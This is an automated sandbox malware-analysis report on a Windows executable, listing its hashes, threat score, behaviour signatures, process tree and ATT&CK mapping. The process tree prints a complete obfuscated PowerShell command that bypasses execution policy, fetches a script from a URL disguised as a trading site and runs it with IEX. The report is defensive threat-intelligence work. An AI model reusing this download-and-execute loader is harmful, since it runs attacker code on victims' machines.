86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04/11/2024, 08:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
Size

14.2MB
MD5

c5d36c7404a03ec6df8024737d97a0c8
SHA1

9a213e487337376c38e0cfdac240dc6ffb5fdc1e
SHA256

86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354
SHA512

812a21f479c56716d892df32a1f910b41310f74de13641d93654a0a722705fb90e114081f2af2ef8c4717febb05715183c0d6deb36bb135f819553c9a9e49216
SSDEEP

196608:MUehdkSzJ4bvuLE5rUSW9rWWsPbWIBMWRlHbLVb4zH:M94x5r1CrWWsTWIfN8

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2712	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2712	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 2316	1960	86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe	32
PID 1960 wrote to memory of 2316	1960	86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe	32
PID 1960 wrote to memory of 2316	1960	86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe	32
PID 2316 wrote to memory of 2444	2316	cmd.exe	34
PID 2316 wrote to memory of 2444	2316	cmd.exe	34
PID 2316 wrote to memory of 2444	2316	cmd.exe	34
PID 2444 wrote to memory of 2464	2444	cmd.exe	35
PID 2444 wrote to memory of 2464	2444	cmd.exe	35
PID 2444 wrote to memory of 2464	2444	cmd.exe	35
PID 2464 wrote to memory of 2712	2464	cmd.exe	37
PID 2464 wrote to memory of 2712	2464	cmd.exe	37
PID 2464 wrote to memory of 2712	2464	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
"C:\Users\Admin\AppData\Local\Temp\86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Windows\system32\cmd.exe
    cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\cmd.exe
      cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2712-6-0x000007FEF59AE000-0x000007FEF59AF000-memory.dmp

Filesize
4KB

Download
memory/2712-7-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2712-8-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2712-9-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-10-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-11-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-12-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-13-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-14-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download